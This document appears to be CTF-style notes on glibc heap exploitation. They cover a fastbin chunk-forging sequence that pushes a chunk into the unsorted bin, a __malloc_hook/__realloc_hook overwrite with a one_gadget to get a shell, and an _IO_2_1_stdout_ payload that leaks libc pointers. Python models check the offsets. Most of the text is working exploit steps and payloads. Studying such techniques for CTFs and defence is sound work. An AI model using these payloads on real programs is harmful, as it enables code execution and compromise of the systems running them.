What if there is no show function and the malloc size is limited?

First free two fastbin chunks, then overwrite the fd of the one at the head of the list so that it points into the data area of the other chunk. Forge a chunk header there (its size must belong to the same fastbin, otherwise malloc() aborts with "memory corruption (fast)"), then malloc twice: the second allocation returns the fake chunk, whose user data overlaps the real chunk's header, so you can rewrite that header's size to a value in the unsorted bin range. Freeing it then leaves a main_arena pointer (fd/bk) on the heap, which is what the stdout trick below builds on. Note that this assumes the requests actually reach the fastbins: on glibc 2.26+ the tcache has to be filled first, otherwise 0x28-byte requests never touch the fastbin list.

add(0x28, 0, b'aaaa')   # 0: chunk A, size 0x30
add(0x28, 1, b'aaaa')   # 1: chunk B, size 0x30, directly after A
add(0x50, 2, b'aaaa')   # 2: 0x60 of padding so that B + 0x90 lands exactly on chunk 3's header
add(0x60, 3, b'aaaa')   # 3: size 0x70; free() will later check this size field as B's "next chunk"
add(0x60, 4, b'aaaa')   # 4: size 0x70, keeps chunk 3 away from the top chunk
delete(0)
delete(1)                # fastbin[0x30]: B -> A -> NULL
edit(1, b'\x20')         # one-byte partial overwrite of B->fd: A becomes A + 0x20 (A's low byte is 0x00 here)
edit(0, p64(0)*3 + p64(0x31))   # forge a chunk at A + 0x20 with size 0x31 so it passes the fastbin size check
add(0x28, 0, b'aaaa')    # 0: gets B back
add(0x28, 1, b'aaaa')    # 1: gets the fake chunk; its user data starts at B's header
edit(1, p64(0) + p64(0x91))     # rewrite B's size from 0x31 to 0x91, outside the fastbin range
delete(0)                # free(B): B goes to the unsorted bin and its fd/bk now hold main_arena pointers
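As an added example (not part of the original notes): a small Python model of the sequence above that replays the add/delete/edit steps against a simulated heap, applies the fastbin size check from malloc() and the next-chunk checks from free(), and reports where the forged 0x90 chunk ends up. The add/delete/edit helpers, the non-PIE heap base 0x603000 and the absence of tcache are assumptions; it needs only the standard library, not pwntools.

```python
import struct

# Assumed, hypothetical heap base for a non-PIE target without tcache (glibc <= 2.25).
HEAP_BASE = 0x603000
FASTBIN_MAX = 0x80          # default global_max_fast on 64-bit glibc
SIZE_SZ = 8

def p64(v):
    return struct.pack('<Q', v)

def u64(b):
    return struct.unpack('<Q', b)[0]

def chunk_size(req):
    """Request size -> chunk size, as glibc's request2size does on 64-bit."""
    return max(0x20, (req + SIZE_SZ + 0xf) & ~0xf)

class Heap:
    """Minimal model of a glibc heap without tcache: sequential carving from top,
    one LIFO fastbin per size with fd stored at data+0, the fastbin size check that
    malloc() performs, and the next-chunk checks that free() performs before putting
    a non-fast chunk into the unsorted bin. Everything else is deliberately left out."""

    def __init__(self, base, size=0x1000):
        self.base = base
        self.mem = bytearray(size)
        self.top = base              # next address carved from the top chunk
        self.fastbin = {}            # chunk size -> head chunk address (0 = empty)
        self.unsorted = []
        self.slots = {}              # program index -> user data pointer

    def read(self, addr, n):
        return bytes(self.mem[addr - self.base:addr - self.base + n])

    def write(self, addr, data):
        self.mem[addr - self.base:addr - self.base + len(data)] = data

    def size_field(self, chunk):
        return u64(self.read(chunk + 8, 8))

    def add(self, req, idx, data):
        sz = chunk_size(req)
        victim = self.fastbin.get(sz, 0)
        if victim:
            # glibc: fastbin_index(chunksize(victim)) must match the bin being served
            if self.size_field(victim) & ~0xf != sz:
                raise RuntimeError("malloc(): memory corruption (fast)")
            self.fastbin[sz] = u64(self.read(victim + 0x10, 8))   # new head = victim->fd
        else:
            victim = self.top
            self.write(victim + 8, p64(sz | 1))                   # size | PREV_INUSE
            self.top += sz
        self.slots[idx] = victim + 0x10
        self.write(victim + 0x10, data)
        return victim

    def edit(self, idx, data):
        self.write(self.slots[idx], data)

    def delete(self, idx):
        chunk = self.slots[idx] - 0x10
        sz = self.size_field(chunk) & ~0xf
        if sz <= FASTBIN_MAX:
            self.write(chunk + 0x10, p64(self.fastbin.get(sz, 0)))  # fd = old head
            self.fastbin[sz] = chunk
            return "fastbin"
        nxt = chunk + sz
        if nxt == self.top:
            return "top"                                  # would merge into top, no unsorted pointer
        if nxt > self.top:
            raise RuntimeError("double free or corruption (out)")
        nsz = self.size_field(nxt)
        if (nsz & ~0xf) <= 2 * SIZE_SZ:
            raise RuntimeError("free(): invalid next size (normal)")
        if not nsz & 1:
            raise RuntimeError("double free or corruption (!prev)")
        self.unsorted.append(chunk)
        return "unsorted"

def run_attack(heap_base=HEAP_BASE, pad_req=0x50):
    """Replay the notes' add/delete/edit sequence and report where the forged chunk
    lands; raises if any of the modelled glibc checks would abort the process."""
    h = Heap(heap_base)
    c0 = h.add(0x28, 0, b'aaaa')
    c1 = h.add(0x28, 1, b'aaaa')
    h.add(pad_req, 2, b'aaaa')              # padding: 0x50 makes c1 + 0x90 hit chunk 3's header
    c3 = h.add(0x60, 3, b'aaaa')
    h.add(0x60, 4, b'aaaa')
    h.delete(0)
    h.delete(1)                             # fastbin[0x30]: c1 -> c0 -> 0
    fake = c0 + 0x20                        # forged chunk inside c0's user data
    assert (c0 & 0xff) + 0x20 < 0x100, "a one-byte partial overwrite must not carry"
    h.edit(1, p64(fake)[:1])                # c1->fd low byte: c1 -> fake
    h.edit(0, p64(0) * 3 + p64(0x31))       # fake->size = 0x31 passes the 0x30 fastbin check
    first = h.add(0x28, 0, b'aaaa')         # returns c1
    second = h.add(0x28, 1, b'aaaa')        # returns fake; its user data is c1's header
    h.edit(1, p64(0) + p64(0x91))           # c1's size: 0x30 -> 0x90, no longer a fastbin size
    state = h.delete(0)                     # free(c1): unsorted bin if chunk 3's header is sane
    return {"chunks": (c0, c1, c3), "fake": fake, "first": first, "second": second,
            "victim": c1, "next_header": c1 + 0x90, "state": state, "unsorted": list(h.unsorted)}
```

Calling `run_attack(pad_req=0x28)` instead of the notes' 0x50 makes `free()` read a zero size field at c1 + 0x90 and raise, which is why the padding chunk has the size it has.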

Hooks: using an offset to forge the size

  • __realloc_hook is mainly used together with __malloc_hook to adjust the stack frame so that a one_gadget's (og) constraints are met. The fake fastbin chunk sits at malloc_hook-0x23 (the stray 0x7f byte at malloc_hook-0x1b becomes its size, so it must be requested through the 0x70 fastbin, i.e. malloc(0x60)); the user data then starts at malloc_hook-0x13, 0xb bytes of padding reach __realloc_hook, and the next qword is __malloc_hook. The usual payload:
offsets = [0, 2, 4, 6, 0xb, 0xc]   # candidate entry points into realloc's prologue; each later one skips one more push, shifting rsp by 8
offset = offsets[0]                # try them in turn until one og constraint (e.g. [rsp+0x30] == NULL) holds
payload = b'a'*11 + p64(og) + p64(libcbase + libc.sym['realloc'] + offset)   # og -> __realloc_hook, realloc+offset -> __malloc_hook
  • The chain is then malloc() -> __malloc_hook -> realloc+offset -> __realloc_hook -> og.
  • exit_hook is also a place to write og to get a shell, except that "exit_hook" is not a real symbol: it is a function pointer inside ld.so's `_rtld_global` structure (reached as `_rtld_global` plus an offset into it) that `_dl_fini` calls during exit().

stdout: using an offset to forge the size

  • A fastbin attack on stdout needs the same offset trick: the fake chunk goes at stdout-0x43 (`_IO_2_1_stdout_`-0x43), where a stray 0x7f byte serves as the size field, so again it is served from the 0x70 fastbin. The user data starts at stdout-0x33:
payload = b'a'*0x33 + p64(0xfbad1800) + p64(0)*3 + b'\x00'   # 0x33 of padding reaches _flags; then _IO_read_ptr/_IO_read_end/_IO_read_base = 0; the final zero byte clears the low byte of _IO_write_base, so the next output call flushes everything from (write_base & ~0xff) up to _IO_write_ptr and leaks libc pointers
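The two offset tricks above (malloc_hook-0x23 and stdout-0x43) as one added example that is not part of the original notes: a sparse memory model seeded with the two facts the tricks rely on (a libc pointer 0x20 below `__malloc_hook` and 0x40 below `_IO_2_1_stdout_`, whose 0x7f high byte becomes the fake chunk's size), the fastbin size check that malloc() applies to the fake chunk, and both payloads written at the resulting user pointer so the affected fields can be read back. All addresses, symbol offsets and the og value are hypothetical; only the relative layout matters.

```python
import struct

def p64(v):
    return struct.pack('<Q', v)

def u64(b):
    return struct.unpack('<Q', b)[0]

def chunk_size(req):
    """Request size -> chunk size, as glibc's request2size does on 64-bit."""
    return max(0x20, (req + 8 + 0xf) & ~0xf)

class Mem:
    """Sparse byte map standing in for libc's writable data; unwritten bytes read as 0."""
    def __init__(self):
        self.m = {}
    def write(self, addr, data):
        for i, b in enumerate(data):
            self.m[addr + i] = b
    def read(self, addr, n):
        return bytes(self.m.get(addr + i, 0) for i in range(n))
    def qword(self, addr):
        return u64(self.read(addr, 8))

# Hypothetical addresses; a real exploit derives them from the libc leak.
LIBC_BASE   = 0x7ffff7a0d000
MALLOC_HOOK = LIBC_BASE + 0x3c4b10      # __malloc_hook; __realloc_hook is the qword just below it
REALLOC     = LIBC_BASE + 0x84690       # libc.sym['realloc'] (illustrative offset)
STDOUT      = LIBC_BASE + 0x3c5620      # _IO_2_1_stdout_ (illustrative offset)
ONE_GADGET  = LIBC_BASE + 0x4527a       # an og address as one_gadget would print it (illustrative)
REALLOC_OFFSETS = (0, 2, 4, 6, 0xb, 0xc)   # entry points into realloc's prologue

def seed_libc(mem):
    """Model the layout the -0x23 / -0x43 tricks depend on: a libc pointer whose 0x7f high
    byte sits at target-0x1b / target-0x3b, and a live stdout whose _IO_write_base and
    _IO_write_ptr point at its own _shortbuf (offset 0x83 in struct _IO_FILE)."""
    mem.write(MALLOC_HOOK - 0x20, p64(LIBC_BASE + 0x3c3260))
    mem.write(STDOUT - 0x40, p64(LIBC_BASE + 0x3c3780))
    mem.write(STDOUT, struct.pack('<I', 0xfbad2887))          # _flags of an idle stdout
    mem.write(STDOUT + 0x20, p64(STDOUT + 0x83))              # _IO_write_base
    mem.write(STDOUT + 0x28, p64(STDOUT + 0x83))              # _IO_write_ptr
    return mem

def fake_fast_chunk(mem, target, delta, req):
    """The corrupted fastbin fd points at target-delta; malloc(req) only hands it out if the
    size field at target-delta+8 belongs to req's bin. Returns (chunk, user_ptr, size_field)."""
    chunk = target - delta
    size_field = mem.qword(chunk + 8)
    if (size_field & ~0xf) != chunk_size(req):
        raise RuntimeError("malloc(): memory corruption (fast)")
    return chunk, chunk + 0x10, size_field

def hook_payload(og, realloc, skip):
    """User data starts at __malloc_hook-0x13: 11 bytes of padding, og on __realloc_hook,
    realloc+skip on __malloc_hook."""
    if skip not in REALLOC_OFFSETS:
        raise ValueError("skip must be one of the realloc prologue offsets")
    return b'a' * 11 + p64(og) + p64(realloc + skip)

def deploy_hook(mem, skip=0xc):
    _, user, _ = fake_fast_chunk(mem, MALLOC_HOOK, 0x23, 0x60)
    mem.write(user, hook_payload(ONE_GADGET, REALLOC, skip))
    return {"realloc_hook": mem.qword(MALLOC_HOOK - 8), "malloc_hook": mem.qword(MALLOC_HOOK)}

def stdout_payload():
    """User data starts at _IO_2_1_stdout_-0x33: padding up to _flags, then _flags, three
    zeroed read pointers and one zero byte into the low byte of _IO_write_base."""
    return b'a' * 0x33 + p64(0xfbad1800) + p64(0) * 3 + b'\x00'

def deploy_stdout(mem):
    _, user, _ = fake_fast_chunk(mem, STDOUT, 0x43, 0x60)
    mem.write(user, stdout_payload())
    write_base, write_ptr = mem.qword(STDOUT + 0x20), mem.qword(STDOUT + 0x28)
    return {"flags": mem.qword(STDOUT) & 0xffffffff, "read_base": mem.qword(STDOUT + 0x18),
            "write_base": write_base, "leak_len": write_ptr - write_base}
```

`fake_fast_chunk` is the part worth keeping around: pointing the fd at target-0x20 instead of target-0x23, or requesting the chunk with 0x28 instead of 0x60, makes it raise exactly where glibc would abort, so the offsets can be sanity-checked before a payload is sent.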